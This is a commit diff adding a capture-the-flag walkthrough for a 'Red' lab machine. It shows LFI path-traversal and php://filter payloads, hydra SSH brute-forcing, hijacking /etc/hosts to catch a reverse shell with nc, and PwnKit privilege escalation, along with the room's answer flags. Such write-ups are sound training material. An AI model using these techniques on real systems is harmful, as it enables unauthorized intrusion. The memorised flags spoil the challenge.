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lucthienphong1120 authored Aug 14, 2023
1 parent cb5c594 commit 40dfe3b
Showing 1 changed file with 188 additions and 0 deletions.
188 changes: 188 additions & 0 deletions
Original file line number Diff line number Diff line change
@@ -0,0 +1,188 @@
# [Red](

> A classic battle for the ages.
## Scanning

scan the target

nmap -sS -sV -sC -T4

there are 2 open ports ssh and http



check the webpage, you will see there is a parameter `?page=home.html`


it appears for a Local File Inclusion (LFI) vulnerable

so i tried some payloads like `?page=../../../etc/passwd` or `?page=....//....//....//etc/passwd` are not work

for some research i found Exploiting Local File Inclusion (LFI) Using PHP Wrapper




we see that 2 users on the machine call red & blue

## Enumeration

i will use LFI Hunter to enummerate some interest files

git clone
cd lfi_hunter
python3 -u '' -l 'php://filter/resource=' -w unix.txt

it reveal a lot of information, but it found something interesting in blue's history


it seem blue has create a hashcat rule to build a password list from a .reminder file



so recreate the password list with the same command

echo 'sup3r_p@s$w0rd!' > pass.txt
hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt


## Exploitation

so, let's bruteforce the password with hydra

hydra -l blue -P passlist.txt ssh://


ssh to blue

ssh [email protected]


| Flag | flag1 |
| --- | --- |
| Answer | THM{Is_thAt_all_y0u_can_d0_blU3} |

i have a message from red, and got kicked out from the machine and blue's password change


try again

hydra -l blue -P passlist.txt ssh://
# and ssh again with new password
ssh [email protected]

there are a cronjob write annoying message, you can check it with `pspy` or just other simple way

ps aux


we see that it's a reverse shell command that is connecting to redrules.thm on port 9001 runs every minute

i decided to check the hosts file and see what is this domain

cat /etc/hosts


but we have read and write permission of it

echo ' redrules.thm' >> /etc/hosts

nc -vlnp 9001


| Flag | flag2 |
| --- | --- |
| Answer | THM{Y0u_won't_mak3_IT_furTH3r_th@n_th1S} |

## Privilege Escalation

so we got the shell, upgrade it

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg

find suid bit

find / -perm -u=s -type f 2>/dev/null


hmm, by some research i see it related to CVE-2021-4034


however, we don't have gcc or make installed


so find a exploit using python

git clone
cp CVE-2021-4034/

edit the location of pkexec on the script



our final flag


| Flag | flag3 |
| --- | --- |
| Answer | THM{Go0d_Gam3_Blu3_GG} |

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